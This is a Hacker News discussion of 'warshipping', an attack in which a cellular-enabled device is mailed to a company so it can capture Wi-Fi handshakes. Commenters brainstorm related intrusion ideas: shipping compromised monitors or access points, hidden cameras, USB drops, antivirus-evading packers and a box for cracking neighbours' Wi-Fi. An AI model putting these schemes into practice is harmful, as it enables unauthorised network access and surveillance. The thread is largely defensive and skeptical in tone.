
Hackers ship their exploits directly to their target’s mailroom - lordqwerty
https://techcrunch.com/2019/08/06/warshipping-hackers-ship-exploits-mail-room/
======
fortran77
Find someone who's out on leave for a while (just look for who's having a baby
on IG) and ship the package to him/her! They won't discover it for weeks and
you'll have plenty of time for your package to sit in the mailroom or on
someone's desk. The danger is when the package is opened, the company may
realize they've been hacked.

Or have it there permanently: Ship an executive a fancy illuminated globe or
desk clock from the local "Chamber of Commerce". Put a camera and mic in there
too to try to get passwords via audio or video surveillance. (Audio recordings
of keyboards typing can be surprisingly effective if you have a big enough
training set)

(On my way to DEFCON! See you all there!)

~~~
hinkley
One of the first pen testers I ever read pointed out that companies do
(sometimes excessive) background checks on their staff all the time and then
they outsource the cleaning crew. When I'm there during the day, there's only
so much I could do without other people noticing. But here's a group with full
access to an empty building full of your equipment for 10 hours a day.

People are going to come at you from your blindside, if they can find it. And
if you consider a certain class of people invisible, then that's what a hacker
wants to be.

~~~
zcrackerz
I once stayed late and noticed a cleaner was wearing a polo from the company I
used to work for. I asked him about it and it turned out he was an engineer
and was filling in for his girlfriend who owned the cleaning business. Holy
red flag! I made some noise and that cleaning company was let go.

~~~
PhasmaFelis
I'm not sure I see why the cleaning company was the problem.

~~~
perl4ever
"his girlfriend who owned the cleaning business"

He wasn't just some guy.

~~~
PhasmaFelis
He was working for the cleaning business, though. If the company was letting
in anyone who works for that cleaner without further investigation, that's
their problem. That's the situation we were talking about upthread, so I
assumed zcrackerz would have said something if it were different.

~~~
lazyasciiart
Where I work, each cleaner gets a badge, just like the engineers. Presumably
she gave her badge to a random other person, aka her boyfriend, so he could
let himself in. Nothing stops me from doing that as an engineer either, but it
would absolutely be a firing offence if caught.

------
el_benhameen
Seems like doing this with a rooted phone would be even sneakier. You've got
everything you need built in: battery, modem, etc. When it eventually does get
opened, the mailroom person is going to think "oh someone ordered a phone"
instead of "holy shit, this bunch of wires and circuit boards is maybe a bomb
and definitely something I should tell the police about".

~~~
cronix
IDK. If they put it in a stuffed animal like the pic in the article, how many
would rip it open to see what's inside?

~~~
acid_burn
But what is more suspicious - a phone nobody ordered or (in the worst case of
discovery) a stuffed animal nobody ordered with custom electronics in it?

~~~
yjftsjthsd-h
Just disguise your electronics to look like a voice box. Heck, you could even
make it functional; microphone, speaker, and a tiny bit of software would make
a convincing toy.

~~~
badwolf
The Furby scare is back!

------
ChuckMcM
One of my favorite security stories came from a well known security researcher
who was asked to try to penetrate the computer system of a national research
lab. On the day of the test he came in and logged in using his own credential
and had full system access. Leaving everyone in the room stunned.

The system was made by DEC and DEC had the process of sending software updates
by magnetic tape. This researcher had made a follow up meeting request and
brought with them a tape that looked exactly like an update tape with label
and all the trimmings. Further they dropped it on to a mail delivery cart that
was already through the 'verify the mail' process. As a result the tape got
delivered to the operators, they mounted it and installed the "updates." Of
course that created an account the pentester used to log in.

Caught the customer by surprise of course, nobody likes to be surprised by the
pentesters but it is always a good thing to have them find something rather
than be penetrated.

The story (which has clearly stuck with me for a long time) left me with an
appreciation for looking at things which aren't normally considered "part of
the IT infrastructure" as part of the attack surface that needs to be
protected.

~~~
2sk21
Interesting - I too heard this story from Paul Karger (a noted security
expert, sadly deceased). Paul's office was next to mine at IBM research and by
talking to him, I realized I lacked the necessary level of paranoia to ever
become a security expert :-)

------
ga-vu
Source, without all the TechCrunch "OMG Hackers" stuff:

[https://securityintelligence.com/posts/package-delivery-
cybe...](https://securityintelligence.com/posts/package-delivery-
cybercriminals-at-your-doorstep/)

Do everyone a favor, mister mod.

~~~
vntok
No thank you. The TC article is both entertaining and factual.

------
gabrielblack
Why an attacker should spend 100$ , sending hardware to the target that could
be potentially tracked following the path between the resellers, could
transport evidences like fingerprints or DNA, using a _telephone connection_
that could also be tracked when the same thing could be done with a good radio
equipment and more discretion ? Anyway, I am the kind of guy that inspects the
ATM praying to find out a skimmer to dissect, so if someone would send me all
that cool stuff directly at home is welcome !

Moreover: battery. How many time a battery of reasonable dimensions could
survive powering that kind of system ? exaggerating, 3 days without using a
heavy use of the phone modem ? But let's say that in that time the attacker
reach the target collecting WIFI keys that doesn't mean that he can compromise
any PC or phone in the home network. So my advise is to send directly
networking hardware compromised (i.e. an access point ) and, if your budget is
100$ , you can send a very nice piece of hardware to the target, avoiding that
he throws all that stuff away (if he can't recycle all like me ). Again, if
someone could send me a free, 100$ worth AP is welcome.

~~~
core-questions
Think about the distance factor. Sure, you could get good radio stuff set up
so that you don't have to be in the parking lot to break in and can avoid
appearing suspicious on any surveillance cameras, but you still have to be
within a few kilometers at most. With warshipping you can be across the
planet.

~~~
austinheap
Having done a handful of red teams our last concern was security cameras since
most times no one looks at security footage until they’re already compromised.

~~~
throwaway_391
Yeah but 'APTs' are generally shitty low end numbers-game attacks that target
HR with terrible macro based malware to breach company perimeters.

Unless you're emulating nation state actors, your ideology of a 'red team'
which focuses on physical access is a disservice to your client and your
industry.

------
jason0597
>Once the warship locates a Wi-Fi network from the mail room or the
recipient’s desk, it listens for wireless data packets it can use to break
into the network. The warship listens for a handshake — the process of
authorizing a user to log onto the Wi-Fi network — then sends that scrambled
data over the cellular network back to the attacker’s servers, which has far
more processing power to crack the hash into a readable Wi-Fi password.

Breaking a hash to obtain the Wi-Fi password? Surely this is impossible?

~~~
Fabricio20
Not really, this is a known "vulnerability" with WPA2 and has been
demonstrated to work a lot of times.

[https://www.aircrack-
ng.org/doku.php?id=cracking_wpa#step_4_...](https://www.aircrack-
ng.org/doku.php?id=cracking_wpa#step_4_-_run_aircrack-ng_to_crack_the_pre-
shared_key)

This is done completely offline once you have the handshake captured and can
be easily scaled.

~~~
austinheap
When I’ve been hired to do red teams we always use giant antennas and find a
nice parking lot a few blocks away to capture the necessary handshakes. This
works great even in downtown SF where the RF interference is absurd.

~~~
munk-a
Yea, this ^. This attack approach is interesting but any company that's
serious about security needs to realize that anything opened up on wifi is a
big hole - this used to be more amusingly exploited by war-driving, just
driving around a neighborhood looking for someone with an open network that
spills out into the street so you could download the latest episode of
friends.

I don't work in this sort of security and it seems terrifying, the social
engineering side is especially crazy.

~~~
zeta0134
I used to do this as a kid in rural Texas, when we could only afford dial-up
at the house and my parents didn't let me on the network very often. Good
times! I'm terrified of the prospect now, but back then I really appreciated
all my neighbors who ran unsecured wireless networks named "linksys"

------
Zhenya
If your network security relies on promixity for ultimate security, you've
done something very wrong.

~~~
sathackr
Yep. You can do the same thing sitting outside on the street with a high gain
antenna. Or one of the many rarely updated, vulnerability-ridden Android
phones that are inside the building in people pockets.

~~~
berkes
The difference being that you can send multiple packages all over the globe
for reasonably cheap.

But you cannot ship yourself to said parking-lots that fast, cheap and never
in parrallel.

------
CPLX
This makes me think of an even more straightforward attack. How hard would it
be to actually just ship them computer hardware and hope it makes it into the
system?

I mean, if a package that looks like it came from NewEgg containing a router
shows up, especially if it matches the type the company usually uses, which
wouldn't be too hard to figure out, what are the chances it just gets tossed
on a shelf to be used next time one is needed? Or do companies have
sophisticated controls in place for something like that?

~~~
gowld
It's the opposite -- companies lack sophisticated controls and without impetus
they'd just never get the item into teh right place to use the item.

Maybe if you shipped it at the same time someone was expecting it, you could
get it to someone who knew what to do with it. Or ship it to the newegg/amazon
warehouse to get mixed in with regular deliveries.

------
mikece
Add one more item to the list of things to keep the Chief Security Officer up
at night... though I've got to imagine this type of attack is at least a
decade old even if it's only becoming well known right now. I've got to wonder
if spear-phishers have been able to combine this type of attack with getting
someone at a company to buy/accept and plug in some type of electronic novelty
device...

~~~
magashna
Why even bother with a novelty? Send some USBs or even drop a few outside the
building. Curiosity is a massive vulnerability

~~~
Phillips126
I work close to IT (being software) for a company ~400 people. We were doing a
security audit and this is one of the things they tested. USB's were loaded up
with curious sounding files that when opened alerted our IT department. It was
shocking how many people picked up and used these random USB's they found
laying around.

~~~
astura
>curious sounding files

You left out the good part, what sort of file names did you use?

~~~
istjohn
settlement_proposal.docx 2019-05-25_bachelor-party.mov
GAME_OF_THRONES_S1E06.mp4 salaries.xlsx

------
Theodores
IBM have a service to sell. Hence this 'fear'.

Real world attacks using this method?

Show me one.

It is like putting superglue in locks. In theory anyone could invest in $5 of
superglue and put a large building out of business for a few hours. It doesn't
happen. But if you were an IBM type of company you could offer this as a
service to companies wanting to test their contingency plans. Seems that is
what is going on here.

~~~
gvb
Agreed: this is an IBM "offensive operations unit" publicity piece. Key items
from TFA:

* TFA quotes Charles Henderson, " _who heads up the IBM offensive operations unit._ "

* "This newly _named_ technique — dubbed “warshipping” — is not a new concept."

* "All of this could be done covertly without anyone noticing — _so long as nobody opens the parcel._ "

A _much_ more practical implementation of this attack vector is the "Malicious
Raspberry Pi Power Strip" (article posted in 2012):
[https://hackaday.com/2012/10/04/malicious-raspberry-pi-
power...](https://hackaday.com/2012/10/04/malicious-raspberry-pi-power-strip-
looks-a-bit-scary/) Those could easily be shipped to end users who would be
pretty likely to plug it in. Add a note in the box "from" the IT department
and I bet it gets a very high percentage success rate.

~~~
rhcom2
That hackaday article has a great comment at the bottom

> One time I had a colony of ants build up inside an APC UPS. Every day, the
> system would make a little popping sound, then switch to battery inversion
> for about two seconds, then switch back to mains. For the longest time I was
> baffled.

> Then one day I noticed some ants making a trail and investigated. It was
> crazy how many ants were living inside it. Apparently, every once in a while
> an ant would come too close to crossing the AC wires and the power would
> short through it, killing the ant instantly and causing the protection
> circuit to put it on battery.

> I find myself wondering if a similar ant infestation would destroy the
> RasPi.

~~~
croh
Haha

------
ojosilva
The WiFi network is an interesting attack vector, although I've seen lots of
places that don't have wifi setup with direct internal network access, only
for internet access. That could limit the effectiveness of the _warship_
somewhat.

When I started the article the first it came to me was that, once that package
actually arrived at someone's desk, the main goal of the attackers would be to
exploit Bluetooth attack vectors, where you can actually snoop at
user/passwords, take control of devices or event plug the warship as a
keyboard and deploy malicious code into the internal PCs.

For some of the bluetooth attack vectors, the warship wouldn't even need the
cell network access and a call home, just a powerful bluetooth antenna should
suffice.

~~~
Bartweiss
Presumably WiFi hijacking would get you access to a lot of systems at a lot of
places, but it does seem like the most intriguing targets (and those most
hardened against other attacks) are least likely to be susceptible.

But now I wonder how many other attacks can be launched from a sealed box in a
mailroom. Van Eck phreaking will get you a decent image off an LCD monitor
from 10+ meters away through multiple interior walls, and can survive
significant channel noise. Other side-channel attacks can directly pick up
keys during decryption, though the proofs are short-range and it's not clear
whether increasing device size/power would boost that.

It'd be tricky and expensive to arrange, especially with the risk of ending up
pointed in a boring direction. But it seems like an absolutely wild idea for
remote access to the contents of even air-gapped monitors.

~~~
vardump
Right. Or just ship a free, already compromised monitor. A free 32-inch 4K
monitor could quickly find itself attached to pretty interesting places.

24/7 power, a platform to mount attacks via Bluetooth, WiFi, microphone,
integrated USB hub, and heck, aren't the new monitors often attached to
Thunderbolt, which is almost the same as PCIe. And even in case it's not
Thunderbolt, it's likely going to be USB-C — not too shabby for evil keyboard
emulation, memory sticks, fake ethernet adapters etc.

Perfect visibility to keyboards as well.

3G for return channel.

------
tyingq
Throwing USB sticks on the ground seems to work well also.
[https://www.wired.com/2011/06/the-dropped-drive-
hack/](https://www.wired.com/2011/06/the-dropped-drive-hack/)

------
gist
> The researchers developed a proof-of-concept device — the warship, which has
> a similar size to a small phone — into a package and dropped it off in the
> mail. The device, which cost about $100 to build, was equipped with a
> 3G-enabled modem, allowing it to be remote-controlled so long as it had cell
> service. With its onboard wireless chip, the device would periodically scan
> for nearby networks — like most laptops do when they’re switched on — to
> track the location of the device in its parcel.

This is beyond belief to me and an example of why there are more security
breaches than would happen if everyone out there (security researcher in
particular and ironic) wasn't eager for their glory of discovering an exploit
that very well might have taken years to uncover if at all.

So they come up with an idea, create and proof of concept, then they publicize
it so that actual hackers can be turned on to a new idea under the guise that
they are going to prevent a problem so that people can protect against it.

> “If we can educate a company about an attack vector like this, it
> dramatically reduces the likelihood of the success of it by criminals,”
> Henderson said.

Like all the other similar 'research' it completely ignores that it is also
educating people who will now know of the exploit and it will give them ideas
on what can be done.

~~~
VikingCoder
We're in a predator-prey relationship. And the stakes are enormous. You can
bet something like this actually has been done in the wild before. In fact,
governments do things like this regularly. The only question is if it's worth
your effort to protect yourself from it.

------
slowmotiony
That seems like a lot of hassle and a pretty big federal crime for only being
able to attack Wi-Fi networks. Why not just park your car outside and use a
laptop?

~~~
mikece
How long can you sit outside a company running Kali Linux and a high gain
antenna array before you attract attention? If you ship someone on the DevOps
team a WiFi-connected plush toy that listens for webhooks from your CI/CD
platform to make happy/sad noises when the build passes/fails -- AND THEY PLUG
IT IN AND LEAVE IT ON -- then the ability to have passive access to the
network for a long period of time will be less noticed.

The example of the WiFi connected stuffed animal listening for webhooks isn't
a made-up example -- I read a blog post about that years ago. Some team had a
"build bunny" whose ears perked up and made happy noises when the build passed
and the ears drooped and made a sad trombone noise when builds failed. The
thing is already RF-active... would anyone break out a spectrum analyzer to
notice if the thing was also transmitting/receiving on LTE and not just WiFi?

~~~
heavenlyblue
But this device won't work for more than a few days anyway.

~~~
lb1lf
Just piggyback it onto something the recipient would want to plug in. Problem
solved.

------
astura
Am I missing something or does this depend on the company having a WiFi
network that's connected to the company's normal internal network and its only
authentication is an somewhat insecure Wifi password?

Because I would think that's a very uncommon case, everywhere I've worked
either didn't have WiFi or the WiFi was a completely external network.

~~~
rst
There are companies with offices that have no Ethernet wiring, where WiFi is
the _only_ network. Some of them write software. (The last time $DAYJOB was
office-shopping, there was one candidate space then occupied by, I think, a
games developer which ran exclusively on WiFi; the cost and time required to
wire the place up was one reason we wound up going elsewhere.)

------
hsnewman
This seems to be more self aggrandizement than something new. Like several
have said, you can buy a off the shelf cell phone and do this with some code.
This attack is only on wifi, and most companies don't place confidential or
enterprise systems on wifi. Yes there are exceptions, but just pulling up to
the side of a building would probably give you the same access to their wifi.

------
SamuelAdams
This could be really fun for people who live in apartment complexes. Break
your neighbor's wifi by using this little, no-fuss box.

You could probably make a killing selling these for $100 - 200 on Etsy or
something.

~~~
heavenlyblue
Only the main question remains: why do you need this if you could simply crack
your neighbour's wifi by using a high-gain antenna hidden behind the walls of
your own flat?

~~~
SamuelAdams
This comment reminds me of the initial response to Dropbox [1]. Sure, you or
I, a very technical group, could set this up manually. But I was suggesting
you manufacture, or part together a very simple box. The idea is this would be
easy for non-technical people to get their wifi. Basically, plug in this box
and in 30 days, you will have your neighbor's wifi password.

[1]:
[https://news.ycombinator.com/item?id=8863](https://news.ycombinator.com/item?id=8863)

~~~
heavenlyblue
Nah. You don't get it, still.

What I am asking is: how is this device better than another (used-friendly,
packaged) device, that can work from your own flat? Moreover, selling that
device with a high-gain antenna isn't any more against user-friendliness that
selling a few boards you're supposed to hide yourself.

Sending a device to your neighbour is essentially a liability. A liability
that, compared to simply listening to the traffic of your neighbour - can
easily give the enforcement agencies enough material to lock you up.

The truth is that hiding the same device inside something else should be done
by the user, because the moment you start putting those into a specific model
of a plush bear, the picture of that plush bear will immediately appear in
security advisories.

------
ohnope
Could you look at the wireless MAC, contact the manufacturer, figure out where
it was sold, contact the seller, and ask for sales records?

Guess it wouldn't prevent people from buying on craigslist.

~~~
ac29
MAC addresses are trivially configurable in software.

Even if they weren't, its easy enough to buy random $5 wifi enabled dev boards
from Aliexpress or somewhere similar, where detailed records tracing
individual boards from manufacturer -> distributor -> reseller -> user are
highly unlikely to exist.

------
Crontab
Mailing a bunch of "free" and "promotional" USB drives, prepared with zero-day
malware, would probably work too. Especially if it was official looking.

~~~
throwaway_391
zero-day malware probably makes malware writing sound difficult. Bypassing
fingerprint-based scanners is reasonably easy with the use of 'packers' (which
can be bought from hacker markets for pretty cheap, or built pretty easily).
Bypassing heuristic based scanners is a little more research-intensive[1], but
some 'packers' do this too.

[https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf](https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf)

------
thinkloop
This is to break into wifi that doesn't leak outside the building?

------
iamnotacrook
Less effort to just ship a mobile phone there I'd imagine.

------
algaeontoast
Love to see Adafruit parts in real-world payloads!!!

------
zitterbewegung
I had an idea to do exactly this but I never did it

~~~
lb1lf
Careful. The Norwegian postal service almost ripped me a new one for having
the gall to ship a microcontroller, a thermometer and a couple of
accelerometers to myself; apparently, buried somewhere deep in some regulation
is the fact that shipping live datalogging equipment is a big no-no. Their
legal department assured me this was par for the course for UPI (International
Postal Union) menber countries.

Among the observations I made was that the tallest drop a package had to
endure going through the sorting machine in Trondheim was 62cm (2ft).

~~~
icedchai
How did they discover you were shipping that stuff?

~~~
lb1lf
I stupidly thought they'd find the idea amusing, so I sent them a copy of the
write-up I did afterwards. (School project.)

They were not amused.

